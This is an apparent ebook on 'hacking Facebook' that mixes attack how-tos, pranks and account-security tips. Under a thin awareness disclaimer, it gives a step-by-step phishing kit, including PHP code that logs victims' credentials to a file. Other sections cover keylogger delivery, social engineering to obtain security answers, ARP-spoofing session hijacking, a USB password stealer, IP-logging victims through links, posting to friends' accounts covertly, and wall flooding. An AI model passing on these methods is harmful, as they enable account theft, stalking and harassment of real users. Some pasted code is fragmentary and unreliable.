Shikhil Sharma is an engineering student who is pursuing his engineering in Computer

Science. He has great interest in Cyber Security, Hacking, Penetration Testing, SEO and

Vulnerability Assessment and loves to write about them.

He also writes about the above mentioned topics at www.hackingtweaks.com and has

also contributed articles on famous sites like www.rafayhackingarticles.net . Shikhil also

believes in white hat techniques and has reported vulnerabilities in famous site like

answers.com, army institute of technology, weather.com, iscripts.com etc.

Follow Him on Twitter @shikhilsharma .

Contact Him on Facebook @shikhilsharma

Drop him a mail at [email protected] .


Success of a person is not a work of one but due to cumulative effort of a number of

people. I would like to thank my parents, family and almighty for their constant support. A

peaceful and supportive environment was provided to me by the people around.

I would like to thank Ishan Garg for designing the cover page. He can be contacted for

further assignment here. Nishit and Joy surely deserve big thank for editing this book and

being the first readers. I’ll also thank Shubham, Priysha, Shriya, Aanchal, Sankalp, Ayur

Mayank, Lalit, Simar, Vinit, Samrath, Ruby, Baljeev, Abhishek and entire Raju and co.

All my friends in field of cyber security including Abhinav Sharma, Lakshya, Gaurav are also

thanked for their constant support. A special mention to Vivek Ramachandran for being a

person to whom I always look up to.

A big thank to entire Hacking Tweaks Family for being a source of constant motivation and

all my readers for reading HackingTweaks.com . I promise that I’ll keep providing quality

content in future too.

Note: The below mentioned methods are just to make the reader aware of, how they can

be trapped by attackers using malicious techniques and few steps to prevent such attacks.

Methods below should not be used by the reader to break into someone’s account. The

author would not be responsible if found doing such.

Hacking Facebook I see a number of posts from people in facebook groups, pages and also all around the

web requesting a hacker or a techie to a HACK facebook for him. These kind of request are

from people who know nothing about technology or hacking and they think that a hacker

knows some magical spells which he will recite and the account of the victim will be

hacked! This is surely not the truth. Hacking facebook is not that easy as it seems to be.

Tip: There are NO facebook hacking softwares in which you have to fill the username of

the person to hack and you get his facebook password!

Figure 1.(Source: google.com)

As mentioned above there is no direct software available to hack facebook but there are a

number of methods available by which facebook can be hacked. These methods include

phishing, keyloggers, social engineering, session hijacking, USB hacking, RAT’s etc.

In the following section, I will be discussing methods in detail which attackers use to hack

a facebook account. The methods are explained in detail so that you can take better

measures to protect your facebook account and increase its security.

Phishing Phishing is a method of hacking facebook in which an attacker provides the victim with a

malicious URL which redirects him to a page which looks just like facebook. Mistaking that

page with facebook, the user enters his username and password there and the entered

username and password go directly to the attacker.

Facebook Phishing is carried out by attacker in the following way:

1. Firstly, create an account on a web hosting site where they upload all there

malicious files.

2. Go to facebook.com and do a ctrl+s on login page of facebook to store it’s html

format so that they can make the required changes in it and upload on the web

hosting site.

3. View the source code of the login page and search for

“action="https://www.facebook.com/login.php?login_attempt=1" method="post"

4. Replacing the above line of code with “login.php”. And renaming the file to


5. Now a php file named “login” needs to be created.

6. To create the login.php file type the following code given on next page in your

favorite text editor and name the file as “login.php”


header("Location: http://www.facebook.com/");

$handle = fopen("password.txt", "a");

foreach($_GET as $variable => $value)


fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");


fwrite($handle, "\r\n");




7. Make a new txt file by the name of passwords.txt.

8. Make a folder by the name of facebook and put index.htm, login.php and

password.txt in it.

9. Upload all the contents of the folder to your web hosting site and choose the name

of the URL from webhosting site such that the victim does not suspect it.

10. Now give the URL to the victim and as soon as he enters his username and

password in phishing page, password.txt file will store credentials of the victim.

FACT: The term “Phishing” was coined by Hackers when they attacked AOL.

Keyloggers A keylogger is a tool which records all the logs of the system of the victim when installed

in his system. A keylogger is capable of recording keystrokes, screen, webcam logs and

almost everything a person is doing on his system. After recording all the logs of the

system the keylogger sends them to the victim.

Keyloggers are used by hackers to get credentials of facebook account by installing the

keylogger in victim machine. But keyloggers are also used by many parents all around the

world to monitor the logs of the computer of their children in order to know what their

children are up to.

Types of Keylogger:

There are basically two types of keyloggers:

1. Physical Keylogger: It is a keylogger which an attacker installs in the system of the

victim when he has physical access to victim’s computer. The keylogger records all

the logs including the facebook password of the victim and send them to mail of the

attacker which he has configured while installing the logger or the logs are collected

physically by the attacker when accesses the victim’s computer next time.

2. Remote Keylogger: A remote keylogger does the same work as the physical

keylogger but it is installed on the victim machine remotely by the attacker. The

attacker can crypt the keylogger file with a song, picture and give it to the victim

and as he opens the song or picture the keylogger gets installed in victim computer.

The logger keeps sending logs to the victim via mail or ftp.

Tip: You can use http://www.fb.com instead of http://www.facebook.com to load

the facebook page faster.

Social Engineering Social engineering is a technique in which a hacker tries to get sensitive information out of

the victim by using his communication skills. The sensitive information the attacker tries

to get can be the username, password, answer to security question etc.

Social engineering has been evolved some time ago only and one world famous hacker

who amazed everyone with his social engineering techniques was Mr.Kevin Mitnick. Kevin

started hacking at an early age of 12 using social engineering to bypass punchcard system

used in Los Angeles bus system by playing social engineering on bus driver.

How to Hackers use Social Engineering to Hack Facebook?

1. Click on 'forgot password' below password field in facebook. You will enter an area

where you will have to help facebook to identify the account of the victim, which

you can easily do by typing his name and a friend’s name or by pasting his profile's

URL in the 'profile link' column.

2. Now in recovery options click on 'answer the security question'. You are given 3

tries, make some relevant guesses, you may get the answer right if you know the

victim well. If you don't then you will have to use Social Engineering to get the

answer from victim.

Some Tips to Make Victim Spell Out What You Want

1. Most of the people on Facebook had set their Security Question long time back,

may be when they had made an account. So most of the people do not change their

question and many of them don't remember the question only. These things will

make your work easy.

2. Don't straight away ask the answer to security question, first talk some random


3. Get to the question slowly and steadily so that victim doesn't suspect you.

Trust me, Social Engineering is one of the Best Methods to Hack any account .All

you need is presence of mind and ability to communicate well with people.

Fact: Facebook is majorly written in C++ and PHP.

Trick: Use symbols used in above picture using http://fsymbols.com/ and many more.

Session Hijacking Session Hijacking refers to an attack in which a hacker temporarily hijacks the ongoing

session of the user and he is able to see what the user is doing. Facebook is used so

much by everyone these days that it is the most exploited website when it comes to

session hijacking as most of the times people are accessing facebook using mobile,

computer etc.

Session Hijacking Using Mobile (Android Device)

A tool which performs session hijacking very efficiently in android platform is


Steps of using:

1. Open the app. 2. Check "ARP-Spoofing" and "Genric Mode".

3. Click on Start. 4. In some time you will start getting various facebook sessions on the same

network of wifi. Click on them to see what the person is doing.

Trick: To post a blank status update, just copy the following code and update it as your

status: "@[0:0: ]" (don't copy the commas).

Hacking by Stealing Password from Stored Cookies

This method of password hacking is used by the hacker when victim has enabled the

“remember password” feature in his facebook account. What attacker does in this case

is that he captures all the cookies stored in the browser of the victim and thus he gets

the stored password too.

How to use Pendrive as Facebook Password Stealer:

1. To use this has some files are needed which can be downloaded from here.

2. Extract pendrive password stealer.rar.

3. Copy all the contents of the file.

4. Paste the contents in the pendrive you want to use for stealing.

5. Insert the pendrive in the system of the victim.

6. Click on "launch" file.

7. Within seconds your pendrive will have text files containing all the stored

passwords of the victim for any website.

Tip: Make it a habit to delete cookies every alternate day as they contain sensitive

information about the work you do online.

This is a section which contains a number of facebook trick, trips and pranks which you

can play on your friends using facebook. You see on facebook fake posts claiming to

change facebook color, giving hundreds of likes etc. In this section you will find 100%

working ways of doing such things which till now you have only heard of.

How to Actually Change Color of Your Facebook

I've been seeing a number of posts by people in my friend list regarding changing of color of facebook to Red,

Yellow, Green and what not. Similarly many events were also created claiming to change color of your

facebook profile by clicking on a unique link. At one point of time I had around 15 events in "event list" of my

profile and all of them claimed to change color of my facebook profile on a specific day and time. All these

requests were quite irritating.

Truth about these FAKE Facebook Color Changing Links

Facebook Color Change links were nothing but spam. Most of the links were shortened URL’s which directed to

some sites which paid per clicks when that link was hit, that is more the number of times that link of facebook

color change got clicked more the person who had spread it got paid by the URL shorten site!

Some links were of type that as a person clicked on them, the similar link got posted on each and every

person's wall is was in the friend list of the person who clicks the link. These kind of links are called clickjacking

links. Clickjacking is a malicious technique of tricking a Web user into clicking on something different to what

the user perceives they are clicking on, thus potentially revealing confidential information or taking control of

their computer while clicking on seemingly innocuous web pages (From:Wikepedia).

How to Actually Change Color of Your Facebook?

Changing color of your facebook account is very simple. If you want to change

color of your facebook account, follow these simple steps:

1. Download a plug-in called Greasemonkey/Tampermonkey.

Mozilla user can download it here and Chrome users here.

2. Install the above downloaded plug-in in your browser.

3. Now install a script from here by clicking "Install" button on right side.

5. Once the script is installed open up your facebook account.

6. As your account is open click on "Tools" menu of your browser and then click on

"User Scripts Commands".

7. In further drop down menu from User Scripts Commands select "Customize Facebook Colors".

8. Now you can easily customize facebook colors are see the change!

How to Get Hundred’s of Likes on Facebook

Sometimes I see a person from my friend list updates a status and his status gets

hundred’s of likes within few minutes or sometimes a person a getting above 500 likes on

a silly status. So here’s a trick on how to get hundred’s of likes on your facebook status

and photos.

1. Go to this site http://www.likelo.com/

2. On going to this site you’ll see something like the screenshot below.

3. You can now simply follow the instructions given on the site to get likes.


Fact: Facebook was launched on February 4, 2004.

Facebook Status/Chat Hacks You can post various images and emoticons on your facebook chat which normal users

can’t using various techniques which are told in the following section.

1. Post funny images like Mr.Bean, Jacky Chan and your own customized images on

facebook chat :

a. Go to http://smileychatcodes.com/ and select there if you want picture

emoticon or text emoticon and get the code then use it in the chat.

2. Add Facebook profiles/images in chat - You can add facebook profiles,

like pages etc. in facebook chat.

All you have to do is type the unique username like this:[[username]]

For example: If I have to post my image in the chat i will type [[shikhil]] and press enter.

You can see the unique username of page or person from the URL/address bar, It is the thing which is inserted after facebook.com. It will be something

like this facebook.com/username (it may be a name or simple an id in numbers)

Update Status with an iPhone even if

You Have a Nokia Phone

You feel jealous of your friends posting status from hi-tech gadgets like

iPhone, Android, Mac, Blackberry? So here's a way out by which you can

also post status from any device you want even if all you have is an old


All you have to do is, go to http://www.fake-wallposts.com/ and click on

the image there of which device you want to display on your status.

Become a hero! Post status once from ipad then from iphone then from

blackberry etc.. :D

Update your Friend’s Status without Telling Him

This is method of hacking in which you will require a lot of social engineering skills. It is an

interesting hack and you can get a number of victims in trap. Follow these steps:

1. Send this link to the victim- https://m.facebook.com/upload.php?_rdr

2. Make sure he logs in.

3. Victim will be given m.facebooksomething type of an e-mail id on which they will

have to mail. Get that id.

4. Mail on that id from your account (gmail, yahoo, etc.) and what you want victim's

status to be, put that as the "subject" of the mail.

Now the status of your choice will be updated in your friends account.

Trick: http://facebook.com/profile.php?=73322363 : This URL which looks as if will take

you to some other facebook page actually opens the profile of the person whoever clicks


How to Trace Anyone on Facebook

Sometimes we find people on facebook who post malicious content or harass someone by

their activities. Tracing these kind of people becomes important. People need to be traced

to sometimes confirm their identity too as someone might be telling us their fake location,

so it becomes important to find their true location. Following steps can be followed if you

want to trace someone on facebook:

1. Go to http://blasze.com/iplog/ .

2. In the “Enter URL or Tracking Code” add a URL in which victim will be interested and

you are sure he will open that site.

3. Now click on “create URL”.

4. A new link will be generated which you will have to give to the victim and you will

also be given a code too.

5. After the victim has clicked it put the link again on the site and click “Track URL”.

Then give the code to get the IP of the victim.

How to Update Status as a

Celebrity or Anyone You Want

Do you want to create funny wall posts like the one above? You can do that simply in no

time! Now I am going to tell how create a fully customizable wall post and play pranks on

your friends. Follow the following steps:

1. Go to http://thewallmachine.com/ and you will see something like below.

2. Now make you sure you connect your facebook account with this site.

3. When connected, upload the photo of celebrity/friend you want to make wall post

as then update the status. You can also customize the date when the status was


Flood Your Friend’s Wall and Inbox

I’ll like to mention that this trick is dedicated to my friend Lalit Ahuja on whom I used this

trick the first time!

This is very annoying trick which can be used to frustrate people by flooding their wall

with hundreds of messages and same can be done with their facebook inbox. By using this

trick you can post hundred’s of messages on a person’s wall within minutes.

So let’s start with the process:

1. You need to download a tool called “Auto Clicker by Shocker”.

2. Open “m.facebook.com” from your browser.

3. Now log into your facebook account from and open the account of the friend on

whom you want to play this prank.

4. Open Auto Clicker.

5. Write anything you want to write on your friend’s wall put don’t click on “post”


6. Before clicking on “post” button click on “click or Press F9” button on Auto Clicker.

7. Now we have successfully flooded the wall of our friend as you can see ;).

Trick: http://laterbro.com/ is site which allows you to pre-schedule your status update, so

you can write a status and specify the time when it should be published.

How to Remove Advertisements, Auto Poke

and Customize Your Facebook the Way You


For the tricks discussed in the following section you need to download

Greasemonkey/Tampermonkey for Mozilla or Chrome as per your choice.

What is Greasemonkey?

Greasemonkey or Tampermonkey is a Plug-in which allows you to install scripts in your

browser which make your browsing experience better.

How to Use It?

Once you have downloaded it you will have to install various scripts too and you will find

its utilities in the “tools” menu of your browser and in some scripts you also get an extra

option of when you right click.

Remove Advertisements from Facebook: You can remove

advertisements from facebook which irritate you and also guide you to links where you

surely don’t want to go. To remove the advertisements from facebook install the script

from here and your will see that once you install the script advertisements will not be

displayed on facebook.

Autopoke Autopoke is a script available which will automatically poke the person who pokes you. It

can be installed from here.

Customize Your Facebook This script shows better quality profile pictures, links to download videos, google calendar

integration and much more! You can fully customize your facebook experience using this

script. Install the script from here .

I see a lot people complaining that their facebook account was Hacked or Hijacked. I

personally think that if you have high security on your account it becomes very

difficult for the hacker to exploit it. I've seen pictures of a number of girls in various pages/groups and it is evident that those pictures are illegally taken from the accounts of girls and now are being

exploited. These are some things which are over looked by many people using facebook if taken seriously, they can increase the security of your account many


Don’t Disclose Your E-mail

One should never disclose his e-mail of facebook and even if you have written your e-mail

in your “bio” you should see to it that you hide it. If you disclose your e-mail then attacker

has great piece of important information about your facebook account and he can hack

the e-mail associated with your facebook and then ultimately hack your facebook


Follow the steps below to hide your e-mail:

1. Go to your profile and click on “about”

2. Now go to “contact information” and click on “edit”.

3. You will see e-mail associated with your account, from there you can control who

can see your e-mail.

Enable Secure Browsing

Secure browsing refers to enabling “https” which provides with a better encryption

that normal “http” browsing which reduces the chances of your account being

hacked. You can enable secure browsing by following these steps:

1. Go to “privacy setting” of your account.

2. Now select the “Security” option from the left side of privacy settings page.

3. Now make sure that you “enable” secure browsing.

Enable Login Notification to Provide 24*7

Security to Your Account

Login Notifications is a way by which you can provide 24*7 security to your

account. In login notifications you enable some recognized devices from which

you regularly come online. If someone logs in your account from apart from

those devices then your get an e-mail and sms notification with the IP from

where the login has been made.

To enable the notifications follow these steps:

1. Go to “security settings” like we did in the last security tip.

2. Now click on edit option in “login notifications”.

3. Make sure you have enabled text and email notification.

4. Click on “Save changes” and now your will get notifications on your phone as

soon as someone logs in from unrecognized device, but initially you will have

to provide facebook with recognized devices as you log in after enabling this


Keep a Strong Password

Keeping a strong facebook password is always recommended as it is difficult to guess. You

should also make sure that you don’t spill out your password to someone and fall to a

social engineering attack. Some tips which should be kept in mind while keeping a strong


Password should not be guessable by anyone.

It should contain above 6-7 character.

Numbers should be there.

Remember to put special keys like “/,>,!,$,^ etc.

A good password is one which uses a combination of all the above types of

keys mentioned.

Conclusion This was my attempt to share all tips and tricks from all around the web with you which

would make you a “Facebook Pro”. I hope after reading this book you are able to make

your entire facebook experience better and you are able to secure your facebook account

in a better way.

Do give your feedback about the book, both positive and negative feedbacks are

welcomed. Don’t hesitate in pointing out my mistakes.

Do you think it’s over here? It isn’t! Do check out http://www.hackingtweaks.com for

more hacks, tips and tricks!!

Best Wishes,

Shikhil Sharma

([email protected])

